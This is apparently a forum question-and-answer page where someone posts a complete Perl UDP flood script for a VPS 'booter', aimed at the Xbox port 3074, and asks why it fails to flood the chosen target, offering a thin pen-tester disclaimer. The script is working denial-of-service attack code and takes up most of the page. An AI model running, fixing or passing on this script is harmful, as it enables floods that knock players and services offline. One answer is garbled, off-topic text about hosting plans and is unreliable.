VPS Perl Script Host booter not working?

I just recently purchased a vps from fanaticaldev.com

My vps is up I am using CentOS5 32 bit

I logged into my vps via putty on ssh port 22 and my ip

The login went great, I then booted up filezilla and added my dos.pl script which contains:

use Socket;

use strict;

if ($#ARGV != 3) {

print "crimez.pl <ip> <port> <size> <time>\n\n";

print " port=0: use random ports\n";

print " size=0: use random size between 64 and 1024\n";

print " time=0: continuous flood\n";

exit(1);

}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";

$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " .

($size ? "$size-byte" : "random size") . " packets" .

($time ? " for $time seconds" : "") . "\n";

print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {

$psize = $size ? $size : int(rand(1024-64)+64) ;

$pport = $port ? $port : int(rand(65500))+1;

send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94w​RAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumus​waraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwX​fjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73u​GIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHY​ZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30​mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVm​fNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEva​cu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruN​uTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5​asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4th​a922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3​phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"), 0, pack_sockaddr_in($pport, $iaddr));}

#!/usr/bin/perl END SCRIPT

The script does everything, acting like it works, yet it will not send packets out, or they are not dosing the ip of my choice.

I run the command with the following line, which is correct:

perl dos.pl 127.0.0.1 3074 65500 6000

of course the LocalHost ip above being my target and 3074 the xbox port

Any help or idea why this is not working?

(I am using this for educational purposes, I am a pen tester and I will be using this in a controlled environment)

3 Answers

Relevance
  • Anonymous
    9 years ago
    Favorite Answer

    This must be due to the programming problem.

    Report this problem to the programming service to get things fixed.

  • Anonymous
    4 years ago

    it actual relies upon on your site visitors (and the "fulfillment" of your employer). - in case you run decrease than a million-5000 calls an afternoon, you're extra beneficial with an basic, SHARED server (that's the main inexpensive and maximum ordinary form of server used, around $50 / 365 days). - in case you circulate above, and you have extra advantageous than one hundred CONCURRENT clients at any time ("concurrent clients": clients who're linked on your server on a similar time), you will hit the decrease of simultaneous connections your server accepts: the two you improve that fee (the internet hosting service will do it for you, in case you do not understand how), and you nevertheless can use a similar server, or you progression to a committed server, a much extra costly option, because it may circulate to $one hundred+ / MONTH. ninety 9.999 % of site owners do not desire committed servers! Nor do you. (a minimum of for the 1st 2 or 3 years). do not fall in the catch of renting an costly answer you do not desire. (I run quite a few web content. Many have over 10,000 clients. nevertheless do not desire a committed server. purely one, in Las Vegas, has over two hundred,000 clients, and needed a committed one).

  • Anonymous
    6 years ago

    Sign in your VPS as root or admin account and type in "yum install perl"

Still have questions? Get your answers by asking now.